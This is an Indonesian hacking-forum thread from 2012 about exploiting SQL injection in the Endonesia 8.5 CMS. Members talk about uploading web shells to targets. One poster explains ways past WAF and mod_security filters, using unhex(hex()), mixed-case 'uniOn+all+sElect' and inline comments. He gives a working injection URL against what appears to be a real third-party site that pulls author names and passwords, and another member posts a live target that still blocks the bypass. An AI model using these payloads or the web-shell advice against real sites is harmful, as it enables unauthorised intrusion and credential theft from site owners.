[Tutor] Exploit ( Endonesia 8.5 SQL Injection )

[Patronum_inc]

ngeri sekali tutornya tpi mantap infonya lanjutkan omz

[momodrock]

(03-04-2012 01:43 AM)ohara_inamiji Wrote:  

(03-04-2012 01:19 AM)momodrock Wrote:  udah dpt target om.. udah upload shell
tp ko' g boleh exekusi shell.x

Quote:Forbidden

You don't have permission to access /mod/content/foto/15.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

ane juga sering om kayak gitu...
kemungkinan karena beberapa settingan di server nya . misal mungkin folder tempat ente upload shell di set chomd nya 777.
saran ane, coba upload di uploader lain di cms nya.
atau lebih jelas nya coba ente simak thread ini
" http://devilzc0de.org/forum/thread-12000.html "
" http://devilzc0de.org/forum/thread-5258.html "
ane juga masih awam kalo masalah upload shell.

mksih om..

[try4error]

caara ngepatchnya gmna ya bang ?

[ohara_inamiji]

(03-04-2012 11:00 AM)try4error Wrote:  caara ngepatchnya gmna ya bang ?

nge patch nya bisa make preg_match atau make fungsi stripos...

http://devilzc0de.org/forum/thread-1256-...ml#pid8038

[EksMillionere]

(03-04-2012 07:33 PM)ohara_inamiji Wrote:  

(03-04-2012 11:00 AM)try4error Wrote:  caara ngepatchnya gmna ya bang ?

nge patch nya bisa make preg_match atau make fungsi stripos...

http://devilzc0de.org/forum/thread-1256-...ml#pid8038

setiap dengar kang ohara ngomong,
berasa aura keilmuan ane menigkat terus-menerus..

[mariachi]

si ohara ngerjain cms endonesia mulu ckckckckck....


btw, dewa ente bro. salam gluers...

[theMuph]

(03-03-2012 10:48 PM)ohara_inamiji Wrote:  

(03-03-2012 10:21 PM)EksMillionere Wrote:  kang ohara, ane masih ucup bnget nih..
itu kok sqli nya beda ama sqli yg ane sering liat,
kaya gini..

Code:

unhex(hex(group_concat(aid,0x3a,name,0x3a,pwd)))

trus

Code:

/*!union*/+all+/*!select*/

trus

Code:

uniOn+all+sElect

itu apaan yahh?? trus, kang ohara kok bisa tau kya gitu cara nginjeknya, bukan cara yg biasa??

sorry bngt kang ohara, ane bnyak tanya,,
ane pingin juga bisa ngoprek diocalhost, kaya kang ohara dan akang2 yg om lainnya di devilc0de

terima kasih sebelumnya

intinya simple banget om thread ane ini, dari ketiga kode yang om tanyai di atas mempunyai fungsi yang sama, yaitu buat bypass forbidden, napa perlu di bypass? karena ketika ente pentest make error based sqli akses di tolak atau forbidden,mungkin karena target menggunakan firewall atau mod_security.

kalo detail dan teori nya saya gak begitu faham, karena learning by doing om

mungkin penjelasan singkat ini berkenan

Spoiler:

"unhex(hex()" ==> pemakaian nya ente masukan di setiap kolom pada url target. contoh :
tanpa penggunaan unhex(hex())

Code:

http://www.planethijau.com/mod.php?mod=diskusi&op=viewcat&cid=-32+uniOn+all+sElect+1,group_concat(name,0x3a,pwd),3+from+authors--

menggunakan unhex(hex())
http://www.planethijau.com/mod.php?mod=d...+authors--

ketika ente buka url di atas, maka tampilan nya tetap forbidden ... maka kita gunakan teknik bypass lain nya... di antaranya seperti yang ane pake pada query di atas...

alternatif pertama : merubah pattern union+all+select menjadi kombinasi huruf kecil dan huruf besar atau bahasa keren nya Case Changing " uniOn+all+sElect."

http://www.planethijau.com/mod.php?mod=d...+authors--

maka bypass pun berhasil

alternatif kedua : menggunakan teknik bypass dengan inline comments, udah saya buat thread nya di sini " http://devilzc0de.org/forum/thread-13188.html " . tetapi inline comment bisanya cuman di dbms mysql. itu bukan kata ane, tapi kata paper yang pernah ane baca "http://www.exploit-db.com/papers/17934/"

contoh penggunaan inline comment union+all+select di ubah menjadi /*!union*/+all+/*!select*/

http://www.planethijau.com/mod.php?mod=d...+authors--

sabar om belajar ada proses nya kok .

om ane dah coba bypass tapi kok masih di tolak ???

nih om http://serulink.webatu.com/mod.php?mod=d...,4,5,6,7--

kira2 knapa ?? n solusinya gmana y om ???

[ohara_inamiji]

(03-19-2012 03:46 PM)theMuph Wrote:  

(03-03-2012 10:48 PM)ohara_inamiji Wrote:  

(03-03-2012 10:21 PM)EksMillionere Wrote:  kang ohara, ane masih ucup bnget nih..
itu kok sqli nya beda ama sqli yg ane sering liat,
kaya gini..

Code:

unhex(hex(group_concat(aid,0x3a,name,0x3a,pwd)))

trus

Code:

/*!union*/+all+/*!select*/

trus

Code:

uniOn+all+sElect

itu apaan yahh?? trus, kang ohara kok bisa tau kya gitu cara nginjeknya, bukan cara yg biasa??

sorry bngt kang ohara, ane bnyak tanya,,
ane pingin juga bisa ngoprek diocalhost, kaya kang ohara dan akang2 yg om lainnya di devilc0de

terima kasih sebelumnya

intinya simple banget om thread ane ini, dari ketiga kode yang om tanyai di atas mempunyai fungsi yang sama, yaitu buat bypass forbidden, napa perlu di bypass? karena ketika ente pentest make error based sqli akses di tolak atau forbidden,mungkin karena target menggunakan firewall atau mod_security.

kalo detail dan teori nya saya gak begitu faham, karena learning by doing om

mungkin penjelasan singkat ini berkenan

Spoiler:

"unhex(hex()" ==> pemakaian nya ente masukan di setiap kolom pada url target. contoh :
tanpa penggunaan unhex(hex())

Code:

http://www.planethijau.com/mod.php?mod=diskusi&op=viewcat&cid=-32+uniOn+all+sElect+1,group_concat(name,0x3a,pwd),3+from+authors--

menggunakan unhex(hex())
http://www.planethijau.com/mod.php?mod=d...+authors--

ketika ente buka url di atas, maka tampilan nya tetap forbidden ... maka kita gunakan teknik bypass lain nya... di antaranya seperti yang ane pake pada query di atas...

alternatif pertama : merubah pattern union+all+select menjadi kombinasi huruf kecil dan huruf besar atau bahasa keren nya Case Changing " uniOn+all+sElect."

http://www.planethijau.com/mod.php?mod=d...+authors--

maka bypass pun berhasil

alternatif kedua : menggunakan teknik bypass dengan inline comments, udah saya buat thread nya di sini " http://devilzc0de.org/forum/thread-13188.html " . tetapi inline comment bisanya cuman di dbms mysql. itu bukan kata ane, tapi kata paper yang pernah ane baca "http://www.exploit-db.com/papers/17934/"

contoh penggunaan inline comment union+all+select di ubah menjadi /*!union*/+all+/*!select*/

http://www.planethijau.com/mod.php?mod=d...+authors--

sabar om belajar ada proses nya kok .

om ane dah coba bypass tapi kok masih di tolak ???

nih om http://serulink.webatu.com/mod.php?mod=d...,4,5,6,7--

kira2 knapa ?? n solusinya gmana y om ???

mungkin udah patching itu bro...